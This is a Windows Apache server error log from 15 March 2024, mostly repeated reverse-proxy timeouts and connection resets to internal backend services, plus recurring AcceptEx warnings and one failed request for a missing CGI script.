[Fri Mar 15 02:04:03.838517 2024] [proxy:error] [pid 12004:tid 21228] [client 201.245.192.253:35040] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:06:54.019216 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 02:09:03.125043 2024] [proxy_http:error] [pid 12004:tid 21500] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:36614] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:09:03.125043 2024] [proxy:error] [pid 12004:tid 21500] [client 201.245.192.253:36614] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:09:31.049092 2024] [proxy_http:error] [pid 12004:tid 21344] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:37488] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:09:31.049092 2024] [proxy:error] [pid 12004:tid 21344] [client 201.245.192.253:37488] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:09:57.397538 2024] [proxy_http:error] [pid 12004:tid 21384] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:40206] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:09:57.397538 2024] [proxy:error] [pid 12004:tid 21384] [client 201.245.192.253:40206] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:11:31.122502 2024] [proxy_http:error] [pid 12004:tid 21104] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:37498] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:11:31.122502 2024] [proxy:error] [pid 12004:tid 21104] [client 201.245.192.253:37498] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:11:57.658149 2024] [proxy_http:error] [pid 12004:tid 21016] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:40224] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:11:57.658149 2024] [proxy:error] [pid 12004:tid 21016] [client 201.245.192.253:40224] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:14:01.771967 2024] [proxy_http:error] [pid 12004:tid 20800] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:38182] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 02:14:01.771967 2024] [proxy:error] [pid 12004:tid 20800] [client 201.245.192.253:38182] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 02:17:59.032784 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 02:30:01.267252 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 02:33:30.432420 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 02:35:41.488250 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 02:56:20.755427 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 03:58:29.896177 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 03:59:17.881861 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 03:59:21.095466 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 03:59:43.824706 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 04:16:47.779305 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 04:59:09.430369 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 05:32:59.290334 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 06:10:29.688887 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 07:07:24.395485 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 07:24:41.703707 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 07:57:51.379001 2024] [cgi:error] [pid 12004:tid 20872] [client 159.223.27.69:41314] script not found or unable to stat: E:/nuevo/cgi-bin/authLogin.cgi
[Fri Mar 15 08:54:08.489533 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 09:46:55.483296 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 09:55:07.008959 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 10:23:59.330602 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 10:25:43.694785 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 10:51:22.185087 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 11:25:02.654836 2024] [proxy_http:error] [pid 12004:tid 21156] (70008)Partial results are valid but processing is incomplete: [client 191.156.246.44:34040] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.246.44 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Fri Mar 15 11:25:02.654836 2024] [proxy_http:error] [pid 12004:tid 21156] [client 191.156.246.44:34040] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.246.44 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Fri Mar 15 11:33:34.242135 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 11:57:04.016611 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 11:57:07.199016 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 11:57:30.193457 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 12:22:06.206649 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 12:52:14.546225 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 12:52:14.577425 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 12:56:41.058094 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:00:41.158115 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:01:33.293407 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:05:46.825052 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:34:08.850442 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:34:12.064047 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:34:35.978889 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 13:46:47.869775 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 14:07:30.709358 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 16:27:54.741754 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 16:29:28.123518 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 16:32:26.993432 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 17:15:07.676530 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21360] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:35688] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21360] [client 201.245.192.253:35688] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21416] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:55905] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21416] [client 201.245.192.253:55905] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21256] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:37338] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21256] [client 201.245.192.253:37338] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21148] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:42502] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21148] [client 201.245.192.253:42502] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21104] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:63924] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21104] [client 201.245.192.253:63924] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21188] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 190.66.251.149:65013] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21188] [client 190.66.251.149:65013] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21500] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52210] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 21500] [client 201.245.192.253:52210] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 20944] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:63930] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.472111 2024] [proxy:error] [pid 12004:tid 20944] [client 201.245.192.253:63930] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21344] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 190.66.251.149:63082] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21344] [client 190.66.251.149:63082] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21044] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:40468] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20972] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.10.206:19782] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21044] [client 201.245.192.253:40468] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21296] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61488] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21296] [client 186.102.49.239:61488] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21156] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52104] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21156] [client 201.245.192.253:52104] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21116] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:59238] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21116] [client 201.245.192.253:59238] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21484] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61484] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21484] [client 186.102.49.239:61484] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 20872] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:59062] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20872] [client 201.245.192.253:59062] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21472] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:43590] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21472] [client 201.245.192.253:43590] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 20804] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52166] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20804] [client 201.245.192.253:52166] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20824] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61491] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21168] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:42030] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21168] [client 201.245.192.253:42030] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20824] [client 186.102.49.239:61491] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20936] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52131] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20936] [client 201.245.192.253:52131] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21324] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:60729] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21324] [client 201.245.192.253:60729] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21128] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:39600] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21128] [client 201.245.192.253:39600] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21260] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:51522] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21260] [client 201.245.192.253:51522] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20992] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61492] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20992] [client 186.102.49.239:61492] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21384] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:63629] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21384] [client 201.245.192.253:63629] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21040] (20014)Internal error: [client 201.245.192.253:35328] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21040] [client 201.245.192.253:35328] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 21028] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:42510] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21028] [client 201.245.192.253:42510] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20848] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:39612] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20848] [client 201.245.192.253:39612] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20712] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:39842] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21200] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52093] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21200] [client 201.245.192.253:52093] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20836] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52215] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20972] [client 186.102.10.206:19782] AH00898: Error reading from remote server returned by /kwssiamovil/sm/acme/a, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20836] [client 201.245.192.253:52215] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20876] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52207] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20876] [client 201.245.192.253:52207] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20720] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:42558] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20720] [client 201.245.192.253:42558] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21004] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52098] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21004] [client 201.245.192.253:52098] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20728] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61489] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20728] [client 186.102.49.239:61489] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20788] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:59287] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20788] [client 201.245.192.253:59287] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21080] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.29.230.22:51846] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21080] [client 186.29.230.22:51846] AH00898: Error reading from remote server returned by /kwssiamovil/sm/des/cjson/pre
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21016] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52095] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21368] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:52100] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21016] [client 201.245.192.253:52095] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21368] [client 201.245.192.253:52100] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20920] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:38910] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20920] [client 201.245.192.253:38910] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20852] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:59324] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20852] [client 201.245.192.253:59324] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 20948] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:39810] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20948] [client 201.245.192.253:39810] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.487711 2024] [proxy_http:error] [pid 12004:tid 21464] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.49.239:61490] AH01102: error reading status line from remote server 172.22.1.16:18080, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 21464] [client 186.102.49.239:61490] AH00898: Error reading from remote server returned by /kwssiamovil/sm/ldap/au, referer: http://localhost/
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20712] [client 201.245.192.253:39842] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Fri Mar 15 18:49:50.472111 2024] [proxy_http:error] [pid 12004:tid 20968] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:51034] AH01102: error reading status line from remote server 172.22.1.16:18080
[Fri Mar 15 18:49:50.487711 2024] [proxy:error] [pid 12004:tid 20968] [client 201.245.192.253:51034] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
